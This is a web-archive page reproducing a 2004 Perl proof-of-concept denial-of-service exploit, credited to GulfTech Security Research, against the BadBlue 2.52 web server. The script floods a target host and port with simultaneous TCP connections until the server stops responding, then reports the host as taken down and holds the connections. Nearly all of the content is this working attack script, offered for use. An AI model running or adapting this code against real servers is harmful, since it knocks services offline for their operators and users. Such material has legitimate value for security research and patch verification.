; BadBlue 2.52 Web Server Multiple Connections Denial of Service Exploit
Documents
Resources
Learning Center
Upload
Plans & pricing Sign in
Sign Out
Your Federal Quarterly Tax Payments are due April 15th Get Help Now >>

BadBlue 2.52 Web Server Multiple Connections Denial of Service Exploit

VIEWS: 33 PAGES: 2

  • pg 1
									                    BadBlue 2.52 Web Server Multiple Connections Denial of Service Exploit   Page 1/2
   1   #!/usr/bin/perl
   2   ##############################################################
   3   # BadBlue v2.52 Web Server − Multiple Connections DoS POC Code
   4   ##############################################################
   5   # BadBlue Web Server can not handle many simultaneous connects
   6   # from the same host, and will lock up until the connects stop
   7   ##############################################################
   8   # This Proof Of Concept Written By GulfTech Security Research
   9   ##############################################################
  10
  11   use Strict;
  12   use Socket;
  13   use IO::Socket;
  14
  15   my   $host   =   $ARGV[0];
  16   my   $port   =   $ARGV[1];
  17   my   $stop   =   $ARGV[2];
  18   my   $size   =   1000;
  19   my   $prot   =   getprotobyname(’tcp’);
  20   my   $slep   =   $ARGV[3];
  21
  22   printf("================================================ ");
  23   printf(" BadBlue v2.52 Web Server Denial Of Service POC ");
  24   printf("================================================ ");
  25   printf("
  26   Making %d Connections To %s ", $stop , $host);
  27
  28   for ($i=1; $i<$stop; $i++)
  29   {
  30   socket($i, PF_INET, SOCK_STREAM, $prot );
  31   my $dest = sockaddr_in ($port, inet_aton($host));
  32   connect($i, $dest);
  33   }
  34
  35   CheckServer($host, $i, $slep, $stop);
  36   KillThreads($stop);
  37   printf("
  38   Exploit Attempt Unsuccesful");
  39   exit;
  40
  41   sub CheckServer($host, $i, $slep, $stop) {
  42   ($host, $i, $slep, $stop) = @_;
  43   $blank = "1512" x 2;
  44   $request = "GET / HTTP/1.0".$blank;
  45   $remote = IO::Socket::INET−>new( Proto => "tcp",
  46   PeerAddr => $host,
  47   PeerPort => $port,
  48   Timeout => ’10000’,
  49   Type => SOCK_STREAM,
  50   );
  51   print $remote $request;
  52   unless ( <$remote> )
GulfTech Security                                                                            08/26/2004
                  BadBlue 2.52 Web Server Multiple Connections Denial of Service Exploit   Page 2/2
  53   {
  54   printf("
  55   Host %s Has Been Successfully DoS’ed ", $host);
  56   printf("
  57   The Host Will Be Down For %d Seconds ", $slep);
  58   sleep($slep);
  59   KillThreads($stop);
  60   exit;
  61   }
  62   }
  63
  64   sub KillThreads($stop) {
  65   $stop = @_;
  66   printf("
  67   Killing All active Connections");
  68   for ($l=1; $l<$stop; $l++) {
  69   shutdown($l,2)|| die("Couldn’t Shut Down Socket");
  70   $l++;
  71   }
  72   }
  73
  74   # milw0rm.com [2004−08−26]




GulfTech Security                                                                          08/26/2004

								
To top